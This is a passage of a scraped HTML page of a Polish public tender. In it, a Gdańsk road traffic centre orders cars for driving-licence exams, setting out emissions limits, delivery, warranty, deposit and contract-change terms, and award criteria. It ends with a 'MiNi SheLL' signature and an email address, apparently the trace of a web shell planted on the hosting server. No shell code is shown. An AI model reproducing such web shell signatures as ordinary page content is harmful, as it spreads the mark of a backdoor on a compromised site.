3.	Zamawiający wymaga, aby zaoferowany samochód osobowy (ZADANIE 3) spełniał następujące wymagania dotyczące zużycia energii, emisji dwutlenku węgla i emisji zanieczyszczeń (zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 10 maja 2011 r. w sprawie innych niż cena obowiązkowych kryteriów oceny ofert                          w odniesieniu do niektórych rodzajów zamówień publicznych):

a.	powinien spełniać normę EURO 6 pod względem emisji tlenków azotu, tlenków węgla, węglowodorów oraz cząstek stałych;

b.	posiadać zużycie energii: nie więcej niż 3,6 MJ/km obliczone jako iloczyn średniego zużycia paliwa w cyklu mieszanym miejskim / pozamiejskim                       (wg danych technicznych) i wartości energetycznej oleju napędowego.

Przy obliczeniu zużycia energii oferowanego samochodu osobowego należy zastosować:
	wartość energetyczną oleju napędowego = 36MJ/l (podaną w załączniku nr 1 Rozporządzenia Prezesa Rady Ministrów z dnia 10 maja 2011 r. w sprawie innych niż cena obowiązkowych kryteriów oceny ofert w odniesieniu do niektórych rodzajów zamówień publicznych);

	wymóg Zamawiającego, aby średnie zużycie paliwa w cyklu mieszanym miejskim / pozamiejskim (wg danych technicznych) wynosiło nie więcej niż 0,10 l/km;

c.	emisja dwutlenku węgla: nie więcej niż 260 g/km. 
ZADANIE 1 , ZADANIE 2, ZADANIE 3
1.	Zamawiający wymaga, aby Wykonawca odpowiednio do zadań (ZADANIE 1, ZADANIE 2, ZADANIE 3):

a.	zrealizował dostawę /wymiany na swój koszt (ZADANIE 1),

b.	zrealizował dostawę na swój koszt (ZADANIE 2 i ZADANIE 3),

c.	dostarczył samochody osobowe do siedziby Zamawiającego Pomorski Ośrodek Ruchu Drogowego w Gdańsku, ul. Równa 19/21 oraz Oddziału w Gdyni, Gdynia, ul. Opata Hackiego 10A (ZADANIE 1),

d.	dostarczył samochody do siedziby Zamawiającego Pomorski Ośrodek Ruchu Drogowego w Gdańsku, ul. Równa 19/21 (ZADANIE 2 i ZADANIE 3),

e.	dostarczył pierwsze 20 sztuk samochodów osobowych (ZADANIE 1) z pakietem ubezpieczeń OC/AC/NNW/Assistance, na wszystkie dostarczane w tej partii pojazdy.

f.	dostarczył samochód osobowy (ZADANIE 2) z pakietem ubezpieczeń OC/AC/NNW/Assistance,

g.	dostarczył samochód osobowy (ZADANIE 3) z pakietem ubezpieczeń OC/AC/NNW/Assistance,

h.	przekazał samochody osobowe (ZADANIE 1, ZADANIE 2, ZADANIE 3) Zamawiającemu na podstawie podpisanego przez przedstawicieli obu Stron protokołu zdawczo - odbiorczego bez uwag. Zamawiający dopuszcza odbiór przedmiotu zamówienia z uwagami pod warunkiem, że uwagi nie będą dotyczyły parametrów technicznych oraz nie będą miały wpływu na normalną eksploatację samochodów osobowych i przeprowadzanie egzaminów państwowych. W przypadku zawarcia uwag w protokole, Wykonawca jest zobowiązany do ich usunięcia w terminie do 14 dni od dnia sporządzenia protokołu zdawczo-odbiorczego,

i.	aby zaoferowane samochody osobowe w ZADANIU 2 i ZADANIU 3 posiadały możliwość demontażu drugiego i trzeciego rzędu siedzeń.  Po zdemontowaniu siedzeń powinny posiadać płaską powierzchnię podłogi, 

j.	wykonał na swój koszt dodatkowe badanie techniczne pojazdów przystosowanych do przeprowadzenia egzaminów państwowych i szkoleń w zakresie prawa jazdy kat. B (ZADANIE 1badanie dotyczy L) i w zakresie prawa jazdy kat. B+E (ZADANIE 2 i ZADANIE 3  badanie dotyczy L i Hak) zgodnie z art. 24 Ustawy o kierujących pojazdami i art. 81 Ustawy Prawo o ruchu drogowym,

k.	udzielił co najmniej 24 miesięcznej gwarancji na samochody osobowe (ZADANIE 1)  rodzaj eksploatacji samochodów osobowych (egzaminy państwowe i szkolenia) nie ma wpływu na warunki gwarancji,

l.	udzielił co najmniej 36 miesięcznej gwarancji na samochód osobowy (ZADANIE 2, ZADANIE 3)  rodzaj eksploatacji samochodu osobowego (egzaminy państwowe i szkolenia) nie ma wpływu na warunki gwarancji,

m.	wyraził zgodę na montaż w samochodach osobowych urządzeń do rejestracji przebiegu części praktycznej egzaminów państwowych bez wpływu na warunki gwarancji (ZADANIE 1, ZADANIE 2, ZADANIE 3),

n.	zobowiązał się  (w ciągu 24 godzin od zgłoszenia przez Zamawiającego w formie pisemnej lub na wskazany przez Wykonawcę adres e-mail) do nieodpłatnego zapewnienia w okresie gwarancji na czas napraw gwarancyjnych oraz w całym okresie związania umową na czas innych napraw realizowanych na zlecenie Zamawiającego u Wykonawcy, zastępczych samochodów osobowych (ZADANIE 1) tej samej marki i modelu o takich samych parametrach i z wyposażeniem odpowiadającym samochodom osobowym, dostarczanych na podstawie umowy z Zamawiającym (Wykonawca powinien dysponować co najmniej dwoma samochodami osobowymi zastępczymi przystosowanymi do przeprowadzania egzaminów państwowych), 

o.	dysponował autoryzowanym serwisem samochodów osobowych na terenie Trójmiasta (Gdańsk lub Sopot lub Gdynia), lub w odległości od siedziby Zamawiającego nie większej niż 30 km,

p.	zobowiązał się do dostarczenia wraz z fakturą pełnej dokumentacji samochodów osobowych (karta pojazdu, wyciąg ze świadectwa homologacji, dane techniczne samochodów osobowych, itp. w języku polskim),

q.	zaoferował przedmiot zamówienia spełniający co najmniej funkcje i parametry przedstawione powyżej, określone jako parametry minimalne.


</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Zamawiający żąda wniesienia wadium w wysokości:
ZADANIE 1
80 000,00 PLN (słownie: osiemdziesiąt tysięcy złotych) przed upływem terminu składania ofert. 

ZADANIE 2
2 200,00 PLN (słownie: dwa tysiące dwieście złotych) przed upływem terminu składania ofert. 

ZADANIE 3
2 600,00 PLN (słownie: dwa tysiące sześćset złotych) przed upływem terminu składania ofert.

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Jeżeli w trakcie realizacji niniejszej Umowy nastąpi zakończenie produkcji zaoferowanych przez Dostawcę pojazdów lub zostaną one wycofane z produkcji (ZADANIE 1), Dostawca dostarczy aktualnie produkowane pojazdy z wymaganymi przez Zamawiającego parametrami technicznymi oraz z wymaganym wyposażeniem (również dodatkowym) w cenie, jaką Dostawca zaoferował w ofercie w niniejszym postępowaniu.

2.	Termin wymiany (ZADANIE 1) może ulec przedłużeniu z następujących przyczyn:
a.	 z przyczyn leżących po stronie Zamawiającego, których nie mógł przewidzieć przy podpisaniu niniejszej umowy, a z powodu których realizacja dostawy (wymiany) w terminie określonym powyżej, spowodować może zaburzenia i opóźnienia ustawowych terminów prowadzenia egzaminów państwowych na prawo jazdy,
b.	z powodu siły wyższej  (zdarzenia o charakterze przypadkowym lub naturalnym (żywiołowym), nie do uniknięcia, takiego, nad którym człowiek nie panuje).

3.	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.

4.	Oprócz wypadków wymienionych w treści Kodeksu Cywilnego, Zamawiającemu                          przysługuje prawo odstąpienia od umowy w razie wystąpienia istotnej zmiany                              okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy. Zamawiający może odstąpić od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego jemu z tytułu wykonania części zamówienia. Odstąpienie od umowy nie rodzi roszczeń odszkodowawczych ani nie stanowi podstawy do naliczania kar umownych.

5.	Zmiana którejkolwiek z osób wyznaczonych do wykonywania przedmiotu zamówienia nie wymaga sporządzenia aneksu do niniejszej umowy, lecz wymagane jest pisemne powiadomienie drugiej strony umowy o zaistniałej zmianie.

6.	Każda zmiana niniejszej umowy dla swej ważności wymaga formy pisemnej.

7.	W przypadku zmian, które będą miały wpływ na koszty wykonania zamówienia przez Dostawcę:
a.	stawki podatku od towarów i usług,
b.	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie                          art. 2 ust. 3-5 ustawy z dnia 10 października 2002 roku o minimalnym wynagrodzeniu za pracę, z późn. zm,
c.	zasad podlegania przez Dostawcę ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawek składki na ubezpieczenie społeczne                             lub zdrowotne,
możliwa będzie zmiana wysokości wynagrodzenia w zakresie wynikającym z ww. zmian.
8.	Zamawiający nie dopuszcza innych zmian umowy, chyba, że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego. 

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />Zamawiający zaleca, aby informacje zastrzeżone, jako tajemnica przedsiębiorstwa były przez Wykonawcę złożone w oddzielnej wewnętrznej kopercie z oznakowaniem tajemnica przedsiębiorstwa", lub spięte (zszyte) oddzielnie od pozostałych, jawnych elementów oferty. Brak jednoznacznego wskazania, które informacje stanowią tajemnicę przedsiębiorstwa oznaczać będzie, że wszystkie oświadczenia                               i zaświadczenia składane w trakcie niniejszego postępowania są jawne                            bez zastrzeżeń.

Zastrzeżenie informacji, które nie stanowią tajemnicy przedsiębiorstwa w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji będzie traktowane, jako bezskuteczne                 i skutkować będzie zgodnie z uchwałą SN z 20 października 2005 (sygn. III CZP 74/05) ich odtajnieniem.
<br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/03/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              POLSKI (PL)<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 60 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawa 100 sztuk fabrycznie nowych samochodów osobowych, w tym                       w drodze cyklicznej wymiany 80 sztuk, przeznaczonych do przeprowadzania egzaminów państwowych i szkoleń w zakresie prawa jazdy kategorii B<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Dostawa 100 sztuk samochodów osobowych, w tym w drodze cyklicznej wymiany                 80 sztuk, przeznaczonych do przeprowadzania egzaminów państwowych i szkoleń                w zakresie prawa jazdy kategorii B. 
Dostarczone przez Wykonawcę samochody osobowe muszą być fabrycznie nowe, jednej  marki i jednego modelu, kompletne, wolne od wad prawnych, materiałowych                            i wykonawczych (rocznik ostatniej wymiany zgodny z rokiem realizacji<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34110000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 48<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa brutto podana w złotych polskich</td><td>60</td></tr><tr><td>gwarancja na sprzęgło podana w km</td><td>10</td></tr><tr><td>wartość zużycia energii podana w MJ/km</td><td>15</td></tr><tr><td>okres udzielonej gwarancji na przedmiot zamówienia podany w miesiącach  </td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawa	1 sztuki fabrycznie nowego samochodu osobowego, przeznaczonego do przewozu 9 osób łącznie z kierowcą, przeprowadzania egzaminów państwowych i szkoleń w zakresie prawa jazdy kategorii B+E oraz w zakresie prawa jazdy kategorii B z kodem 96<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa jednego samochodu osobowego o dopuszczalnej masie całkowitej do 3200 kg, przeznaczonego do przewozu 9 osób łącznie z kierowcą, przystosowanego do przeprowadzania egzaminów państwowych i szkoleń w zakresie prawa jazdy kategorii B+E oraz w zakresie prawa jazdy kategorii B z kodem 96.

Dostarczony przez Wykonawcę samochód osobowy musi być fabrycznie nowy, kompletny, wolny od wad prawnych, materiałowych i wykonawczych<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34115200-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 60<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa brutto podana w złotych polskich </td><td>60</td></tr><tr><td>wartość zużycia energii  podana w MJ/km</td><td>20</td></tr><tr><td>okres udzielonej gwarancji na przedmiot zamówienia podany w miesiącach</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Dostawa	1 sztuki fabrycznie nowego samochodu osobowego, przeznaczonego do przewozu 9 osób łącznie z kierowcą, przeprowadzania egzaminów państwowych i szkoleń w zakresie prawa jazdy kategorii B+E <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa jednego samochodu osobowego o dopuszczalnej masie całkowitej do 3500 kg, przeznaczonego do przewozu 9 osób łącznie z kierowcą, przystosowanego do przeprowadzania egzaminów państwowych i szkoleń w zakresie prawa jazdy kategorii B+E. 

Dostarczony przez Wykonawcę samochód osobowy musi być fabrycznie nowy, kompletny, wolny od wad prawnych, materiałowych i wykonawczych <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34115200-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 60<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa brutto podana w złotych polskich</td><td>60</td></tr><tr><td>wartość zużycia energii  podana w MJ/km </td><td>20</td></tr><tr><td>okres pełnej gwarancji na przedmiot zamówienia podany w miesiącach</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com